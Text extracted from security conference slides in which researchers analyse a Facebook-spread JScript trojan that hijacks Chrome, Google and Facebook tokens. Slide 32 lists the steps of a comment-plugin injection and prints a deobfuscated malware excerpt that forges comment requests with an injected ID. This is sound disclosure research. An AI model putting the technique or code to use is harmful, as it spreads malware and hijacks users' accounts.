![Page 1: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/1.jpg)
TAG ME IF YOU CAN
Ido NaorSr. Researcher, Kaspersky Lab Tw: @idonaor1
Dani GolandFounder & CEO, Undot Tw: @danigoland
![Page 2: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/2.jpg)
GReAT - Kaspersky Lab Elite Team Of Researchers
Global Research & Analysis Team, Since 2008
Threat Intelligence, research and innovation leadership
Focus: APTs, critical infrastructure threat, banking threats, sophisticated targeted attacks.
• A decade in security eco• Manage regional research in
Israel• ExpertiZ
• Malware analysis• Reverse Engineering• Penetration Testing
• HobbiZ Responsible Disclosure:
![Page 3: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/3.jpg)
Undot – Uncovering Ideas
• Founder & CEO, Undot
• ExpertiZ• Full-Stack Developer• Entrepreneur• Data Science Freak
• HobbiZOrganizing and competing
in Hackathons
UndotExpertswith
Control It – Remotes Unified!
~500K downloads
Front
Mobile
Back
Cloud
![Page 4: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/4.jpg)
IN THE NEWS…
![Page 5: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/5.jpg)
RECAP
![Page 6: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/6.jpg)
![Page 7: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/7.jpg)
MENTIONED BY A FRIEND
![Page 8: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/8.jpg)
WINDOWS DESIGNATED
• File: comment_27734045.jse• Language: JScript• Size: ~5.31 KB• MD5: 9D3DF2A89FDB7DA40CEB4DE02D605CFA• SHA1: 6D658331FE6D7F684FEE384A29CE95F561A5C2EA
JScript is Microsoft's dialect of the ECMAScript standard[2] that is used in Microsoft's Internet Explorer.
JScript is implemented as an Active Scripting engine. This means that it can be "plugged in" to OLE Automation
applications that support Active Scripting, such as Internet Explorer, Active Server Pages, and Windows Script Host.[3] It
also means such applications can use multiple Active Scripting languages, e.g., JScript, VBScript or PerlScript.
![Page 9: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/9.jpg)
GLIMPSE INTOTHE JSE TROJAN
1) Domain name2) Msxml2.XMLHTTP3) ADODB.Stream4) Wscript.Shell5) JPG ext?6) %AppData%7) Autoit.exe8) Manifest.json9) Run.bat10) Ping.js
![Page 10: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/10.jpg)
WHO IS REALLY AMONG US?
/Stats/history/pingjse3462
![Page 11: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/11.jpg)
BACKGROUND CHECK
• Emerged: January 2015 on• Turkish variables and comments in its files• Threat actor: BePush/Killim• Innovative techniques to spread malware through social networks• Favor multi-layered obfuscation, mainly in JavaScript, and utilize
multi-layered URL shorteners, third-party hosting providers and multi-stage payloads.
• Obfuscate their infrastructure using Cloudflare
![Page 12: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/12.jpg)
INITIAL INFECTION
![Page 13: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/13.jpg)
DYNAMIC ANALYSIS
![Page 14: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/14.jpg)
CHROME EXTENSION AS A MITM
![Page 15: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/15.jpg)
?A HIDDEN VULNERABILITY
![Page 16: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/16.jpg)
THE MISSING PIECE
![Page 17: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/17.jpg)
OBFUSCATED DROPPER
![Page 18: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/18.jpg)
DEOBFUSCATION
![Page 19: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/19.jpg)
ANTI-ANALYSIS
• Debugger;
![Page 20: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/20.jpg)
ANTI-ANALYSIS
• Code hashes
![Page 22: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/22.jpg)
GOOGLE TOKEN HIJACK
• Google URL Shortner• Google Drive API
![Page 23: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/23.jpg)
GOOGLE DRIVE AS A MALWARE HUB
![Page 24: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/24.jpg)
VICTIM INFO STEALERDropper → Chrome Takeover → Malicious JS → Google Permissions → Uploading malware to storage → HERE
![Page 25: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/25.jpg)
VICTIM INFO STEALER
![Page 26: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/26.jpg)
VICTIM INFO STEALER
![Page 27: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/27.jpg)
GOOGLE DRIVE PERMISSION MODIFICATION
![Page 28: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/28.jpg)
CREATING MALICIOUS CALLERS
![Page 29: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/29.jpg)
FACEBOOK TOKEN HIJACK
![Page 31: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/31.jpg)
HOW TO FAIL SAFE
![Page 32: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/32.jpg)
VULNERABILITY IN THE WILD
1) Initialize a request to the comment plugin
2) Get api_key & comment data3) Create a comment on the
plugin, containing url to Google Drive
4) Post is now posted – get its ID5) Create a new comment on the
web platform6) Inject the ID from the FB plugin
to the web FB comment ID 7) Notification generated8) FB debug check9) Set privacy to public10) Set comment text to null
deleting the traces.
this.commentData["share_id"] = globalFunction["between"]('"commentIDs":["', '"', f["responseText"])["split"]("_")[1]; // 400539608410_10153962897128411
post_params = {"ft_ent_identifier": this["commentData"]["share_id"], ← injection!!"comment_text": gF["chain"](10)["toLowerCase"](),"source": 21,"client_id": Date["now"]() + ":" + Math["floor"](U2e[F](Date["now"](), 1000)),"session_id": globalFunction["chain"](8)["toLowerCase"](),"comment_text": "Array of tagged friends"}url: "https://www.facebook.com/ufi/add/comment/?dpr=1",type: "POST",async: true,headers: { "content-type": "application/x-www-form-urlencoded"}
www.facebook.com/plugins/feedback.php?api_key=<ID>&href=https://<GOOGLE_DRIVE>/<JSE_FILE>
![Page 33: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/33.jpg)
ALL IN ALL
![Page 34: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/34.jpg)
QUESTIONS?
![Page 35: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/35.jpg)
THANK YOU!Follow us on Twitter:
@IdoNaor1@DaniGoland